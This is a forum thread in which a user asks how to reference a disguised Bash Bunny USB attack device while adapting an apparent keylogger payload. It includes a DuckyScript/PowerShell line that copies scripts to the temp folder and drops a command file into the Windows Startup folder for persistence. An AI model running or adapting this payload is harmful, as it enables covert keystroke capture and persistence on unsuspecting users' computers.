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which name do i use?


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so this kinda feels like a dumb question, but which name do I use in payloads? The one that shows up when I plug it into my computer in arming mode without the SD card? Or the name that shows up when I plug it in in arming with the SD card? For easier reference, without the SD card, I have it named BashBunny. And with the SD card, I have it named "The Fat USB" with random media files so it's disguised.

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Not exactly sure what you mean, but if you mean that you need a reference to the Bunny in PowerShell scripts that is used in payloads that is using ATTACKMODE STORAGE, then you need to use the label/name of the Bunny that the storage has that is mounted to the target. If using a Micro SD card, it's the label of the card. If not using any Micro SD card, it's the label of the Bunny internal storage.

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I think that should answer my question. I'm messing around with PrettyBoyCosmo's BunnyKeyhook. The reference to the Bunny is actually in the duckyscript.txt instead of a PS script. Idk if this would be a better question for here or for Cosmo but I'm also wondering if there'd be an issue if there was an SD card in the Bunny. Because would it still see the payloads directory if it's referenced the way it is?


REM move files to appropiate directories
REM change 'BashBunny' to the name of your bash bunny
REM change 'switch1' to switch position that stores the paylaod
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";


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a bit of clarification because reading that back, I can see it being confusing. Because with your answer I'd have to rename <'BashBunny'> to <The Fat USB>, but if I do this, would it still have access to the payloads folder? Since the payloads folder is under the BashBunny storage. Hopefully that clarifies my question.

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